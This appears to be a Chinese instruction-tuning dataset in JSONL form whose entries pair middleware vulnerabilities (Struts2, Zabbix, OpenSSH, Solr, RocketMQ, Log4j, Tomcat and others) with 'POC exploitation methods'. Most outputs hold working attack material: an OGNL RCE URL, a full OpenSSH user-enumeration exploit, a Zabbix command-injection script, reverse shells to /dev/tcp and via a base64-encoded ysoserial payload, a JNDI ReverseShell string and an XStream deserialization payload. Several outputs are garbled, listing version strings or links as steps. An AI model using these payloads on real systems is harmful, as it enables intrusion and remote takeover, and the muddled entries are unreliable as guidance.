  223. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Struts2 S2-008 远程代码执行漏洞\n漏洞描述:S2-008 涉及多个漏洞,Cookie 拦截器错误配置可造成 OGNL 表达式执行,但是由于大多 Web 容器(如 Tomcat)对 Cookie 名称都有字符限制,一些关键字符无法使用使得这个点显得比较鸡肋。另一个比较鸡肋的点就是在 struts2 应用开启 devMode 模式后会有多个调试接口能够直接查看对象信息或直接执行命令,正如 kxlzx 所提这种情况在生产环境中几乎不可能存在,因此就变得很鸡肋,但我认为也不是绝对的,万一被黑了专门丢了一个开启了 debug 模式的应用到服务器上作为后门也是有可能的。 参考阅读: -  http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html 漏洞详情: - http://struts.apache.org/docs/s2-008.html\n影响版本:影响版本: 2.1.0 - 2.3.1\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【POC利用方法】\n1. docker-compose build\ndocker-compose up -d\n2. http://your-ip:8080/S2-008/devmode.action?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@java.lang.Runtime@getRuntime%28%29.exec%28%22open%20%2fApplications%2fCalculator.app%22%29)\n3. echo \"bash -i >& /dev/tcp/192.168.174.128/9999 0>&1\" > shell.sh\npython3环境下:python -m http.server 80\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Struts2 S2-008 远程代码执行漏洞.md"}
    224. 

  224. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Zabbix Server trapper命令注入漏洞 CVE-2020-11800\n漏洞描述:Zabbix 是由Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。在[CVE-2017-2824](https://github.com/vulhub/vulhub/blob/master/zabbix/CVE-2017-2824)中,其Server端 trapper command 功能存在一处代码执行漏洞,而修复补丁并不完善,导致可以利用IPv6进行绕过,注入任意命令。 参考链接: - https://xz.aliyun.com/t/8991\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2020-11800\n【POC利用方法】\n1. docker-compose up -d\n2. import sys\nimport socket\nimport json\nimport sys\n\n\ndef send(ip, data):\n    conn = socket.create_connection((ip, 10051), 10)\n    conn.send(json.dumps(data).encode())\n    data = conn.recv(2048)\n    conn.close()\n    return data\n\n\ntarget = sys.argv[1]\nprint(send(target, {\"request\":\"active checks\",\"host\":\"vulhub\",\"ip\":\"ffff:::;touch /tmp/awesome_poc_2\"}))\nfor i in range(10000, 10500):\n    data = send(target, {\"request\":\"command\",\"scriptid\":1,\"hostid\":str(i)})\n    if data and b'failed' not in data:\n        print('hostid: %d' % i)\n        print(data)\n3. data = send(target, {\"request\":\"command\",\"scriptid\":1,\"hostid\":str(i)})\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Zabbix Server trapper命令注入漏洞 CVE-2020-11800.md"}
    225. 

  225. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:OpenSSH 用户名枚举漏洞 CVE-2018-15473\n漏洞描述:OpenSSH 7.7前存在一个用户名枚举漏洞,通过该漏洞,攻击者可以判断某个用户名是否存在于目标主机中。 参考链接: - http://openwall.com/lists/oss-security/2018/08/15/5 - https://github.com/Rhynorater/CVE-2018-15473-Exploit - https://www.anquanke.com/post/id/157607 > OpenSSL是密码学库,主要设计目的是加密网络数据流(应用层和传输层)。OpenSSH是使用OpenSSL实现的Remote Shell。\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2018-15473\n【POC利用方法】\n1. docker-compose build\ndocker-compose up -d\n2. python3 sshUsernameEnumExploit.py --port 20022 --userList exampleInput.txt your-ip\n3. #!/usr/bin/env python\nimport argparse\nimport logging\nimport paramiko\nimport multiprocessing\nimport socket\nimport string\nimport sys\nimport json\nfrom random import randint as rand\nfrom random import choice as choice\n# store function we will overwrite to malform the packet\nold_parse_service_accept = paramiko.auth_handler.AuthHandler._handler_table[paramiko.common.MSG_SERVICE_ACCEPT]\n\n# list to store 3 random usernames (all ascii_lowercase characters); this extra step is added to check the target\n# with these 3 random usernames (there is an almost 0 possibility that they can be real ones)\nrandom_username_list = []\n# populate the list\nfor i in range(3):\n    user = \"\".join(choice(string.ascii_lowercase) for x in range(rand(15, 20)))\n    random_username_list.append(user)\n\n# create custom exception\nclass BadUsername(Exception):\n    def __init__(self):\n        pass\n\n# create malicious \"add_boolean\" function to malform packet\ndef add_boolean(*args, **kwargs):\n    pass\n\n# create function to call when username was invalid\ndef call_error(*args, **kwargs):\n    raise BadUsername()\n\n# create the malicious function to overwrite MSG_SERVICE_ACCEPT handler\ndef malform_packet(*args, **kwargs):\n    old_add_boolean = paramiko.message.Message.add_boolean\n    paramiko.message.Message.add_boolean = add_boolean\n    result  = old_parse_service_accept(*args, **kwargs)\n    #return old add_boolean function so start_client will work again\n    paramiko.message.Message.add_boolean = old_add_boolean\n    return result\n\n# create function to perform authentication with malformed packet and desired username\ndef checkUsername(username, tried=0):\n    sock = socket.socket()\n    sock.connect((args.hostname, args.port))\n    # instantiate transport\n    transport = paramiko.transport.Transport(sock)\n    try:\n        transport.start_client()\n    except paramiko.ssh_exception.SSHException:\n        # server was likely flooded, retry up to 3 times\n        transport.close()\n        if tried < 4:\n            tried += 1\n            return checkUsername(username, tried)\n        else:\n            print('[-] Failed to negotiate SSH transport')\n    try:\n        transport.auth_publickey(username, paramiko.RSAKey.generate(1024))\n    except BadUsername:\n            return (username, False)\n    except paramiko.ssh_exception.AuthenticationException:\n            return (username, True)\n    #Successful auth(?)\n    raise Exception(\"There was an error. Is this the correct version of OpenSSH?\")\n\n# function to test target system using the randomly generated usernames\ndef checkVulnerable():\n    vulnerable = True\n    for user in random_username_list:\n        result = checkUsername(user)\n        if result[1]:\n            vulnerable = False\n    return vulnerable\n\ndef exportJSON(results):\n    data = {\"Valid\":[], \"Invalid\":[]}\n    for result in results:\n        if result[1] and result[0] not in data['Valid']:\n            data['Valid'].append(result[0])\n        elif not result[1] and result[0] not in data['Invalid']:\n            data['Invalid'].append(result[0])\n    return json.dumps(data)\n\ndef exportCSV(results):\n    final = \"Username, Valid\\n\"\n    for result in results:\n        final += result[0]+\", \"+str(result[1])+\"\\n\"\n    return final\n\ndef exportList(results):\n    final = \"\"\n    for result in results:\n        if result[1]:\n            final+=result[0]+\" is a valid user!\\n\"\n        else:\n            final+=result[0]+\" is not a valid user!\\n\"\n    return final\n\n# assign functions to respective handlers\nparamiko.auth_handler.AuthHandler._handler_table[paramiko.common.MSG_SERVICE_ACCEPT] = malform_packet\nparamiko.auth_handler.AuthHandler._handler_table[paramiko.common.MSG_USERAUTH_FAILURE] = call_error\n\n# get rid of paramiko logging\nlogging.getLogger('paramiko.transport').addHandler(logging.NullHandler())\n\narg_parser = argparse.ArgumentParser()\narg_parser.add_argument('hostname', type=str, help=\"The target hostname or ip address\")\narg_parser.add_argument('--port', type=int, default=22, help=\"The target port\")\narg_parser.add_argument('--threads', type=int, default=5, help=\"The number of threads to be used\")\narg_parser.add_argument('--outputFile', type=str, help=\"The output file location\")\narg_parser.add_argument('--outputFormat', choices=['list', 'json', 'csv'], default='list', type=str, help=\"The output file location\")\ngroup = arg_parser.add_mutually_exclusive_group(required=True)\ngroup.add_argument('--username', type=str, help=\"The single username to validate\")\ngroup.add_argument('--userList', type=str, help=\"The list of usernames (one per line) to enumerate through\")\nargs = arg_parser.parse_args()\n\ndef main():\n    sock = socket.socket()\n    try:\n        sock.connect((args.hostname, args.port))\n        sock.close()\n    except socket.error:\n        print('[-] Connecting to host failed. Please check the specified host and port.')\n        sys.exit(1)\n\n    # first we run the function to check if host is vulnerable to this CVE\n    if not checkVulnerable():\n        # most probably the target host is either patched or running a version not affected by this CVE\n        print(\"Target host most probably is not vulnerable or already patched, exiting...\")\n        sys.exit(0)\n    elif args.username: #single username passed in\n        result = checkUsername(args.username)\n        if result[1]:\n            print(result[0]+\" is a valid user!\")\n        else:\n            print(result[0]+\" is not a valid user!\")\n    elif args.userList: #username list passed in\n        try:\n            f = open(args.userList)\n        except IOError:\n            print(\"[-] File doesn't exist or is unreadable.\")\n            sys.exit(3)\n        usernames = map(str.strip, f.readlines())\n        f.close()\n        # map usernames to their respective threads\n        pool = multiprocessing.Pool(args.threads)\n        results = pool.map(checkUsername, usernames)\n        try:\n            if args.outputFile:\n                outputFile = open(args.outputFile, \"w\")\n        except IOError:\n            print(\"[-] Cannot write to outputFile.\")\n            sys.exit(5)\n        if args.outputFormat=='json':\n            if args.outputFile:\n                outputFile.writelines(exportJSON(results))\n                outputFile.close()\n                print(\"[+] Results successfully written to \" + args.outputFile + \" in JSON form.\")\n            else:\n                print(exportJSON(results))\n        elif args.outputFormat=='csv':\n            if args.outputFile:\n                outputFile.writelines(exportCSV(results))\n                outputFile.close()\n                print(\"[+] Results successfully written to \" + args.outputFile + \" in CSV form.\")\n            else:\n                print(exportCSV(results))\n        else:\n            if args.outputFile:\n                outputFile.writelines(exportList(results))\n                outputFile.close()\n                print(\"[+] Results successfully written to \" + args.outputFile + \" in List form.\")\n            else:\n                print(exportList(results))\n    else: # no usernames passed in\n        print(\"[-] No usernames provided to check\")\n        sys.exit(4)\n\nif __name__ == '__main__':\n    main()\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/OpenSSH 用户名枚举漏洞 CVE-2018-15473.md"}
    226. 

  226. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Shiro 认证绕过漏洞 CVE-2010-3863\n漏洞描述:Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。 在Apache Shiro 1.1.0以前的版本中,shiro 进行权限验证前未对url 做标准化处理,攻击者可以构造`/`、`//`、`/./`、`/../` 等绕过权限验证 参考链接: - https://github.com/apache/shiro/commit/ab8294940a19743583d91f0c7e29b405d197cc34 - https://xz.aliyun.com/t/11633#toc-2 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3863\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2010-3863\n【POC利用方法】\n1. docker-compose up -d\n2. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3863\n3. 环境启动后,访问`http://your-ip:8080`即可查看首页。\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache Shiro 认证绕过漏洞 CVE-2010-3863.md"}
    227. 

  227. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache RocketMQ RCE 漏洞 CVE-2023-33246\n漏洞描述:RocketMQ 是阿里巴巴在2012年开发的分布式消息中间件,专为万亿级超大规模的消息处理而设计,具有高吞吐量、低延迟、海量堆积、顺序收发等特点。 RocketMQ 5.1.0 及以下版本,在一定条件下存在远程命令执行风险。RocketMQ 的 NameServer、Broker、Controller 等多个组件暴露在外网且缺乏权限验证,攻击者可以利用该漏洞利用更新配置功能以 RocketMQ 运行的系统用户身份执行命令。此外,攻击者可以通过伪造 RocketMQ 协议内容来达到同样的效果。\n影响版本:``` Apache RocketMQ <= 5.1.0 Apache RocketMQ <= 4.9.5 ```\n网络测绘:``` title=\"RocketMQ\" ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2023-33246\n【POC利用方法】\n1. Apache RocketMQ <= 5.1.0\nApache RocketMQ <= 4.9.5\n2. title=\"RocketMQ\"\n3. java -jar CVE-2023-33246.jar -ip \"target-ip\" -cmd \"command\"\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache RocketMQ RCE 漏洞 CVE-2023-33246.md"}
    228. 

  228. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Tomcat8 弱口令+后台getshell漏洞\n漏洞描述:Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。其中,欲访问后台,需要对应用户有相应权限。 Tomcat7+权限分为: - manager(后台管理) - manager-gui 拥有html页面权限 - manager-status 拥有查看status的权限 - manager-script 拥有text接口的权限,和status权限 - manager-jmx 拥有jmx权限,和status权限 - host-manager(虚拟主机管理) - admin-gui 拥有html页面权限 - admin-script 拥有text接口权限 这些权限的究竟有什么作用,详情阅读 http://tomcat.apache.org/tomcat-8.5-doc/manager-howto.html 在`conf/tomcat-users.xml`文件中配置用户的权限: ``` <?xml version=\"1.0\" encoding=\"UTF-8\"?> <tomcat-users xmlns=\"http://tomcat.apache.org/xml\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://tomcat.apache.org/xml tomcat-users.xsd\" version=\"1.0\"> <role rolename=\"manager-gui\"/> <role rolename=\"manager-script\"/> <role rolename=\"manager-jmx\"/> <role rolename=\"manager-status\"/> <role rolename=\"admin-gui\"/> <role rolename=\"admin-script\"/> <user username=\"tomcat\" password=\"tomcat\" roles=\"manager-gui,manager-script,manager-jmx,manager-status,admin-gui,admin-script\" /> </tomcat-users> ``` 可见,用户tomcat拥有上述所有权限,密码是`tomcat`。 正常安装的情况下,tomcat8中默认没有任何用户,且manager页面只允许本地IP访问。只有管理员手工修改了这些属性的情况下,才可以进行攻击。\n影响版本:Tomcat版本:8.0\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【POC利用方法】\n1. <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<tomcat-users xmlns=\"http://tomcat.apache.org/xml\"\n              xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n              xsi:schemaLocation=\"http://tomcat.apache.org/xml tomcat-users.xsd\"\n              version=\"1.0\">\n\n    <role rolename=\"manager-gui\"/>\n    <role rolename=\"manager-script\"/>\n    <role rolename=\"manager-jmx\"/>\n    <role rolename=\"manager-status\"/>\n    <role rolename=\"admin-gui\"/>\n    <role rolename=\"admin-script\"/>\n    <user username=\"tomcat\" password=\"tomcat\" roles=\"manager-gui,manager-script,manager-jmx,manager-status,admin-gui,admin-script\" />\n    \n</tomcat-users>\n2. docker-compose up -d\n3. ┌──(root kali)-[/home/kali]\n└─# msfconsole\n\n# 搜索tomcat相关模块\nmsf6 > search tomcat\n...\n   23  auxiliary/scanner/http/tomcat_mgr_login\tnormal     No     Tomcat Application Manager Login Utility\n...\n\n# 使用tomcat_mgr_login模块进行爆破\nmsf6 > use auxiliary/scanner/http/tomcat_mgr_login\n\n# 设置服务地址\nmsf6 auxiliary(scanner/http/tomcat_mgr_login) >show options\nmsf6 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS <your-ip>\nRHOSTS => <your-ip>\nmsf6 auxiliary(scanner/http/tomcat_mgr_login) > run\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache Tomcat8 弱口令+后台getshell漏洞.md"}
    229. 

  229. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Skywalking 8.3.0 graphql SQL注入漏洞\n漏洞描述:Apache Skywalking是一款针对分布式系统的应用程序性能监视工具,为微服务,云原生和基于容器(Docker,Kubernetes,Mesos)的体系结构而设计。 在Apache Skywalking 8.3.0版本及以前的GraphQL接口中,存在一处H2 Database SQL注入漏洞。 参考链接: - https://mp.weixin.qq.com/s/hB-r523_4cM0jZMBOt6Vhw - https://github.com/apache/skywalking/commit/0bd81495965d801315dd7417bb17333ae0eccf3b#diff-ec87a1cdf66cdb37574d9eafd4d72d99ed94a38c4a8ff2aa9c7b8daeff502a2c\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【POC利用方法】\n1. docker-compose up -d\n2. POST /graphql HTTP/1.1\nHost: your-vps-ip:8080\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\nConnection: close\nContent-Type: application/json\nContent-Length: 405\n\n{\n    \"query\":\"query queryLogs($condition: LogQueryCondition) {\n  queryLogs(condition: $condition) {\n    total\n    logs {\n      serviceId\n      serviceName\n      isError\n      content\n    }\n  }\n}\n\",\n    \"variables\":{\n        \"condition\":{\n            \"metricName\":\"sqli\",\n            \"state\":\"ALL\",\n            \"paging\":{\n                \"pageSize\":10\n            }\n        }\n    }\n}\n3. 环境启动后,访问`http://your-ip:8080`即可查看Skywalking的页面。\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache Skywalking 8.3.0 graphql SQL注入漏洞.md"}
    230. 

  230. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Solr Log4j 组件 远程命令执行漏洞\n漏洞描述:Apache Solr Log4j 组件 远程命令执行漏洞,详情略\n影响版本:``` Apache Solr ```\n网络测绘:``` app=\"APACHE-Solr\" ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【POC利用方法】\n1. Apache Solr\n2. app=\"APACHE-Solr\"\n3. /solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/87}&wt=json\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache Solr Log4j 组件 远程命令执行漏洞.md"}
    231. 

  231. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:ACME Mini_httpd 任意文件读取漏洞 CVE-2018-18778\n漏洞描述:Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下可以保持一定程度的性能(约为Apache的90%),因此广泛被各类IOT(路由器,交换器,摄像头等)作为嵌入式服务器。而包括华为,zyxel,海康威视,树莓派等在内的厂商的旗下设备都曾采用Mini_httpd组件。 在mini_httpd开启虚拟主机模式的情况下,用户请求`http://HOST/FILE`将会访问到当前目录下的`HOST/FILE`文件。 ```c (void) snprintf( vfile, sizeof(vfile), \"%s/%s\", req_hostname, f ); ``` 见上述代码,分析如下: - 当HOST=`example.com`、FILE=`index.html`的时候,上述语句结果为`example.com/index.html`,文件正常读取。 - 当HOST为空、FILE=`etc/passwd`的时候,上述语句结果为`/etc/passwd`。 后者被作为绝对路径,于是读取到了`/etc/passwd`,造成任意文件读取漏洞。\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2018-18778\n【POC利用方法】\n1. (void) snprintf( vfile, sizeof(vfile), \"%s/%s\", req_hostname, f );\n2. docker-compose up -d\n3. GET /etc/passwd HTTP/1.1\nHost: \nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\nConnection: close\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/ACME Mini_httpd 任意文件读取漏洞 CVE-2018-18778.md"}
    232. 

  232. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Zabbix latest.php SQL注入漏洞 CVE-2016-10134\n漏洞描述:zabbix是一款服务器监控软件,其由server、agent、web等模块组成,其中web模块由PHP编写,用来显示数据库中的结果。\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2016-10134\n【POC利用方法】\n1. docker-compose up -d\n2. zbx_sessionid=cb4f5e3307ffbca669d1a14be14dc1e0\n3. 这个漏洞也可以通过jsrpc.php触发,且无需登录:`http://your-ip:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)`:\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Zabbix latest.php SQL注入漏洞 CVE-2016-10134.md"}
    233. 

  233. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Weblogic 弱口令+前台任意文件读取\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【POC利用方法】\n1. docker-compose up -d\n2. <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<weblogic-web-app xmlns=\"http://www.bea.com/ns/weblogic/weblogic-web-app\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://www.bea.com/ns/weblogic/weblogic-web-app http://www.bea.com/ns/weblogic/weblogic-web-app/1.0/weblogic-web-app.xsd\">\n<context-root>/test</context-root>\n</weblogic-web-app>\n3. D:.\n│   file.jsp\n│   index.jsp\n│   ueditor.jsp //your webshell\n│\n├───META-INF\n│       MANIFEST.MF\n│\n└───WEB-INF\n    │   web.xml\n    │   weblogic.xml\n    │\n    └───classes\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Weblogic 弱口令+前台任意文件读取.md"}
    234. 

  234. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Solr RCE 远程命令执行漏洞 CVE-2017-12629\n漏洞描述:Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞:[XML实体扩展漏洞(XXE)](https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE)和远程命令执行漏洞(RCE),二者可以连接成利用链,编号均为CVE-2017-12629。 参考阅读: - [Apache Solr远程代码执行漏洞(CVE-2017-12629)从利用到入侵检测](https://www.freebuf.com/sectool/159970.html) - [cve-2017-12629 apache solr xxe & rce 漏洞分析](https://blog.csdn.net/whatday/article/details/106974271?utm_medium=distribute.pc_relevant.none-task-blog-title-7&spm=1001.2101.3001.4242)\n影响版本:``` Apache Solr < 7.1 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2017-12629\n【POC利用方法】\n1. Apache Solr < 7.1\n2. https://github.com/vulhub/vulhub.git\ncd vulhub/solr/CVE-2017-12629\ndocker-compose build\ndocker-compose up -d\n3. POST /solr/demo/config HTTP/1.1\nHost: xxx.xxx.xxx.xxx:8983\nConnection: close\nContent-Type: application/json  \nContent-Length: 198\n\n{\n  \"add-listener\" : {\n    \"event\":\"postCommit\",\n    \"name\":\"newlistener-1\",\n    \"class\":\"solr.RunExecutableListener\",\n    \"exe\":\"ping\",\n    \"dir\":\"/bin/\",\n    \"args\":[\"1.1.1.1\"]\n  }\n}\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache Solr RCE 远程命令执行漏洞 CVE-2017-12629.md"}
    235. 

  235. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache RocketMQ 远程代码执行漏洞 CVE-2023-37582\n漏洞描述:此漏洞是由于 CVE-2023-33246 补丁未修复完全,当 RocketMQ 的NameServer 组件暴露在外网,且缺乏有效的身份认证时,攻击者可以利用更新配置功能,以 RocketMQ 运行的系统用户身份执行任意命令。\n影响版本:``` RocketMQ < 4.9.7 RocketMQ < 5.1.2 ```\n网络测绘:``` title=\"RocketMQ\" ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2023-37582\n【POC利用方法】\n1. RocketMQ < 4.9.7\nRocketMQ < 5.1.2\n2. title=\"RocketMQ\"\n3. import socket\nimport binascii\n \nclient = socket.socket()\nclient.settimeout(5)\n \nclient.connect((target_ip,target_port))\n## make payload\njson = '{\"code\":318,\"extFields\":{\"test\":\"RockedtMQ\"},\"flag\":0,\"language\":\"JAVA\",\"opaque\":266,\"serializeTypeCurrentRPC\":\"JSON\",\"version\":433}'.encode('utf-8')\n \nbody=('Thanks DawnT0wn').encode('utf-8')\njson_lens = int(len(binascii.hexlify(json).decode('utf-8'))/2)\nhead1 = '00000000'+str(hex(json_lens))[2:]\nall_lens = int(4+len(binascii.hexlify(body).decode('utf-8'))/2+json_lens)\nhead2 = '00000000'+str(hex(all_lens))[2:]\ndata = head2[-8:]+head1[-8:]+binascii.hexlify(json).decode('utf-8')+binascii.hexlify(body).decode('utf-8')\n## send\nclient.send(bytes.fromhex(data))\ndata_recv = client.recv(1024)\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache RocketMQ 远程代码执行漏洞 CVE-2023-37582.md"}
    236. 

  236. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Log4j Server 反序列化命令执行漏洞 CVE-2017-5645\n漏洞描述:Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2017-5645\n【POC利用方法】\n1. docker-compose up -d\n2. java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 \"touch /tmp/success\" | nc your-ip 4712\n3. java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 \"bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMTc0LjEyOC85OTk5IDA+JjE=}|{base64,-d}|{bash,-i}\" | nc your-ip 4712\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache Log4j Server 反序列化命令执行漏洞 CVE-2017-5645.md"}
    237. 

  237. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Struts2 S2-052 远程代码执行漏洞 CVE-2017-9805\n漏洞描述:Struts2-Rest-Plugin是让Struts2能够实现Restful API的一个插件,其根据Content-Type或URI扩展名来判断用户传入的数据包类型,有如下映射表: | 扩展名 | Content-Type                      | 解析方法               | | ------ | --------------------------------- | ---------------------- | | xml    | application/xml                   | xstream                | | json   | application/json                  | jsonlib或jackson(可选) | | xhtml  | application/xhtml+xml             | 无                     | | 无     | application/x-www-form-urlencoded | 无                     | | 无     | multipart/form-data               | 无                     | jsonlib无法引入任意对象,而xstream在默认情况下是可以引入任意对象的(针对1.5.x以前的版本),方法就是直接通过xml的tag name指定需要实例化的类名: ``` <classname></classname> //或者 <paramname class=\"classname\"></paramname> ``` 所以,我们可以通过反序列化引入任意类造成远程命令执行漏洞,只需要找到一个在Struts2库中适用的gedget。 漏洞详情: - http://struts.apache.org/docs/s2-052.html - https://yq.aliyun.com/articles/197926\n影响版本:影响版本: Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2017-9805\n【POC利用方法】\n1. <classname></classname>\n//或者\n<paramname class=\"classname\"></paramname>\n2. docker-compose build\ndocker-compose up -d\n3. POST /orders/3/edit HTTP/1.1\nHost: your-ip:8080\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\nConnection: close\nContent-Type: application/xml\nContent-Length: 2415\n\n<map>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString>\n      <flags>0</flags>\n      <value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\">\n        <dataHandler>\n          <dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\">\n            <is class=\"javax.crypto.CipherInputStream\">\n              <cipher class=\"javax.crypto.NullCipher\">\n                <initialized>false</initialized>\n                <opmode>0</opmode>\n                <serviceIterator class=\"javax.imageio.spi.FilterIterator\">\n                  <iter class=\"javax.imageio.spi.FilterIterator\">\n                    <iter class=\"java.util.Collections$EmptyIterator\"/>\n                    <next class=\"java.lang.ProcessBuilder\">\n                      <command>\n                        <string>touch</string>\n                        <string>/tmp/awesome_poc</string>\n                      </command>\n                      <redirectErrorStream>false</redirectErrorStream>\n                    </next>\n                  </iter>\n                  <filter class=\"javax.imageio.ImageIO$ContainsFilter\">\n                    <method>\n                      <class>java.lang.ProcessBuilder</class>\n                      <name>start</name>\n                      <parameter-types/>\n                    </method>\n                    <name>foo</name>\n                  </filter>\n                  <next class=\"string\">foo</next>\n                </serviceIterator>\n                <lock/>\n              </cipher>\n              <input class=\"java.lang.ProcessBuilder$NullInputStream\"/>\n              <ibuffer></ibuffer>\n              <done>false</done>\n              <ostart>0</ostart>\n              <ofinish>0</ofinish>\n              <closed>false</closed>\n            </is>\n            <consumed>false</consumed>\n          </dataSource>\n          <transferFlavors/>\n        </dataHandler>\n        <dataLen>0</dataLen>\n      </value>\n    </jdk.nashorn.internal.objects.NativeString>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/>\n  </entry>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n  </entry>\n</map>\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Struts2 S2-052 远程代码执行漏洞 CVE-2017-9805.md"}
    238. 

